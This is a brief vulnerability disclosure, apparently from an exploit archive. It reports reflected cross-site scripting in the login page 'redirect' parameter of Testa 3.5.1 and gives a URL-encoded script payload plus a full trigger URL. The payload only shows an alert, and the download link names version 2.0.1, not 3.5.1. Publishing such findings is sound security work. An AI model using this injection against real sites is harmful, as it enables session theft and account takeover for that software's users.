Testa 3.5.1 Cross Site Scripting

# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)# Date: 28/08/2022# Exploit Author: Ashkan Moghaddas# Vendor Homepage: https://testa.cc# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip# Version: 3.5.1# Tested on: Windows/Linux# Proof of Concept:# 1- Install Testa 3.5.1# 2- Go to https://localhost.com/login.php?redirect=XXXX# 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E# 4- XSS has been triggered.# Go to this url "https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E"XSS will trigger.